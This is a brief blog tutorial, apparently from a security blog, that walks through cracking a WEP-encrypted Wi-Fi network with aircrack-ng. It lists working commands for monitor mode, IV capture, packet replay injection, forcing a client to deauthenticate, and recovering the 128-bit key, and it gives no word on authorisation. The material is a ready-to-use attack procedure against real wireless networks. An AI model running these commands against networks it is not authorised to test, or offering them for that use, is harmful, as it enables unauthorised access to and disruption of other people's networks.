WEP Cracking with aircrack

 

  1. Finding the target
  2. Capture packets from target (IVS)
  3. Cracking WEP

1. Finding the target

The first step is to find our target. Ensure that our target uses WEP Encryption and that you can get a good signal.

Commands

  • airmon-ng start wifi0 // Start your card in monitoring mode
  • airodump-ng ath1 // Start monitoring and find your target (Write down channel of your target, in this example 11)


WEP Crack

2. Capture packets from target (IVS)

Now we are ready to start sniffing for IVs for the specific target. The best way is to find a valid packet for the specific access point and brute forcing with this packet so we will collect easily the IVs packets.

Commands

  • airodump-ng –channel 11 –write out –ivs ath1 // Sniffing IVs for channel 11 (you can also specify for a specific access point
  • aireplay-ng -2 -b 00:11:50:FB:22:20 -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -p 0841 -h 00:13:02:10:2A:C9 ath1 // It starts reading packets until it will find a valid one to replay
  • aireplay-ng -0 1 -a 00:11:50:FB:22:20 -c 00:13:02:10:2A:c9 ath1 // We help the previous command to find a valid packet by forcing the client to reconnect to the access point
  • Press ‘y’ to the second command so it will use the valid packet and start brute forcing the access point

WEP Crack

3. Cracking WEP

After some time that you will collect enough IVs (500.000 to 1.000.000 for WEP 128) you can start trying to crack the WEP.

Commands

  • aircrack-ng -f 2 -a 1 -b 00:11:50:FB:22:20 -n 128 out-02.ivs // Try to crack WEP 128 key for the specify access point

WEP Crack

Share

Leave a Reply

Photo

root

June 23rd


Papers


line

© 2018 SuRGeoNix | Security Blog